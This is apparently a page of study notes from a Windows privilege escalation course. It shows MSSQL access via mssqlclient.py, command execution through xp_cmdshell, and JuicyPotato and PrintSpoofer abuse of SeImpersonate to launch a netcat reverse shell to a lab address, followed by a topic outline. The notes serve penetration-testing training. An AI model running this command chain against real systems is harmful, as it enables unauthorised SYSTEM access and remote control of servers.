5.Seimpersonate-and-seassignprimarytoken

MSSQL Privilege Escalation

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

Enable xp_cmdshell

enable_xp_cmdshell

Execute commands using xp_cmdshell

xp_cmdshell whoami
xp_cmdshell whoami /priv

Exploiting with JuicyPotato

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

Start netcat listener

nc -lnvp 8443

Exploiting with PrintSpoofer

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

  • SeImpersonate Privilege:

    • Its purpose and how it's used to impersonate other user tokens.

    • How it's often abused for privilege escalation ("Potato" attacks).

  • SeAssignPrimaryToken Privilege:

    • Its purpose and how it relates to process tokens.

  • Token Impersonation:

    • The general concept of how process tokens work in Windows.

  • Privilege Escalation via Service Accounts:

    • How service accounts with these privileges can be exploited.

    • Examples involving SQL Server and IIS.

  • JuicyPotato:

    • Its use in exploiting SeImpersonate and SeAssignPrimaryToken.

    • Its limitations on newer Windows versions.

  • PrintSpoofer:

    • An alternative to JuicyPotato for newer Windows versions.

    • Its use in exploiting impersonation privileges.

  • MSSQL Exploitation:

    • Using xp_cmdshell to gain code execution.

    • Using mssqlclient.py to connect to a sql server.

  • Reverse Shells:

    • Using netcat to catch reverse shells.

Previous4.windows-privileges-overviewNext6.Sedebugprivilege

Last updated